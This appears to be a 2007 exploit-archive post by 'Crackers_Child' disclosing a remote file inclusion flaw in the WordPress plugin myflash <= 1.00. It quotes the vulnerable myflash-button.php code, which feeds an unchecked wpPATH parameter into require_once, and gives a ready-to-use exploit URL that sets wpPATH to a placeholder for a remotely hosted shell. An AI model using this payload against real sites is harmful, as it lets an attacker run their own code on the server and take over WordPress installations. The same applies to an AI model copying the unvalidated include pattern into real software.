[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
# Published : 2007-05-01
# Author : Crackers_Child
# Previous Title : Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability
# Next Title : psipuss 1.0 (editusers.php) Remote Change Admin Password Exploit
--------------------------------- [ Oyle Kahpe Ki D??nya ! ] --------------------------------------
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: cybermilitan@hotmail.com
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : Wordpress plugin
Web Site : http://alexrabe.boelinger.com/
--------------------------------------------------------------------------------
Vuln ?¡ãn myflash-button.php
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
global $wpdb;
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
--------------------------------------------------------------------------------
greets:
Every Body
--------------------------------------------------------------------------------
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------
# www.Syue.com [2007-05-01]